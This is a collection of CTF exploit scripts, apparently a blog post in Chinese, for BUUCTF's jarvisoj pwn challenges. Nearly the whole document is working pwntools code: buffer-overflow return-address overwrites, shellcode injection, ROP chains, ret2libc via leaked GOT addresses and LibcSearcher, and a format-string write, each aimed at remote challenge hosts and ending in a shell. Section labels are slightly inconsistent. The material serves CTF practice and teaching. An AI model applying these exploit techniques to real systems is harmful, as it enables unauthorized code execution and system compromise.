BUUCTF jarvisoj exp整合

0x01 jarvisoj_level0

 簡單的地址改寫

from pwn import *

p = remote('node3.buuoj.cn', 26882)
#p = process('./level0')

shell_addr = 0x0000000000400596

p.sendline('a'*0x88+p64(shell_addr))

p.interactive()

 

0x01 jarvisoj_level2

下面的代碼本地可行，但遠程由於數據接收順序有問題，可以用jarvisoj_level3的payload稍作修改使用。

from pwn import *
context.log_level = 'debug'

p = remote('node3.buuoj.cn', 29661)
#p = process('level1')
p.recvuntil('this:')
buf_addr = int(p.recv(10), 16)
print hex(buf_addr)

payload = asm(shellcraft.sh())
payload = payload.ljust(0x8C, '\x00')
payload += p32(buf_addr)


p.sendline(payload)
p.interactive()

 

0x02 jarvisoj_level2

 簡單rop，在可執行文件中找到rop

from pwn import *

p = remote('node3.buuoj.cn', 26369)

bin_sh = 0x0804A024
system_addr = 0x08048320

p.sendline('a'*0x8C + p32(system_addr) + p32(0) + p32(bin_sh))

p.interactive()

 

0x03 jarvisoj_level2_x64

 64位的

from pwn import *

context.log_level = 'debug'

p = remote('node3.buuoj.cn', 27014)
#p = process('./level2_x64')
elf = ELF('./level2_x64')

pop_rdi = 0x00000000004006B3
system_plt = elf.plt['system']
str_sh = 0x0000000000600A90

p.recvuntil('Input:\n')
p.sendline('a'*0x88 + p64(pop_rdi) + p64(str_sh) + p64(system_plt))

p.interactive()

 

0x04 jarvisoj_level3

 泄露libc基址，構造rop

from pwn import *
from LibcSearcher import *

#p = process('./level3')
p = remote('node3.buuoj.cn', 26763)
elf = ELF('level3')

read_got = elf.got['read']
write_plt = elf.plt['write']
vul_addr = 0x0804844B


payload = 'a'*0x8C +p32(write_plt) + p32(vul_addr) + p32(1) + p32(read_got) + p32(4)
p.sendlineafter('Input:\n', payload)

read_addr = u32(p.recv(4))
libc = LibcSearcher('read', read_addr)

libc_base = read_addr - libc.dump('read')

system_addr = libc_base + libc.dump('system')
str_bin_sh = libc_base + libc.dump('str_bin_sh')
payload = 'a'*0x8C + p32(system_addr) + p32(0) +p32(str_bin_sh)

p.sendlineafter('Input:\n', payload) 

p.interactive()

 

0x05 jarvisoj_level4

和 jarvisoj_level3一樣，只有輸入有些差別。
 

0x06 jarvisoj_level3_x64

from pwn import *
from LibcSearcher import *
context.log_level = 'debug'

p = remote('node3.buuoj.cn', 26368)
elf = ELF('./level3_x64')

vul_addr = 0x00000000004005E6
pop_rdi_ret = 0x00000000004006b3
pop_rsi_r15_ret = 0x00000000004006b1
write_got = elf.got['write']
write_plt = elf.plt['write']

payload = 'a'*0x88 + p64(pop_rsi_r15_ret) + p64(write_got) + p64(0) + p64(pop_rdi_ret) + p64(1) + p64(write_plt) + p64(vul_addr)
p.sendlineafter('Input:\n', payload)

write_addr = u64(p.recv(6).ljust(8, '\x00'))
libc = LibcSearcher('write', write_addr)
libc_base = write_addr - libc.dump('write')

system_addr = libc_base + libc.dump('system')
str_bin_sh = libc_base + libc.dump('str_bin_sh')


payload = 'a'*0x88 + p64(pop_rdi_ret) + p64(str_bin_sh) + p64(system_addr) + p64(vul_addr)
p.sendlineafter('Input:\n', payload)

p.interactive()

 

0x07 jarvisoj_fm

 簡單的格式化字符串，找到棧的偏移量，向x寫入4就行。

from pwn import *
p = remote('node3.buuoj.cn', 27369)
# p = process('./fm')
elf = ELF('./fm')
x_addr = 0x0804A02C

payload = p32(x_addr) + '%11$n'
p.sendline(payload)
p.interactive()

隨手關注一個，就是對我的支持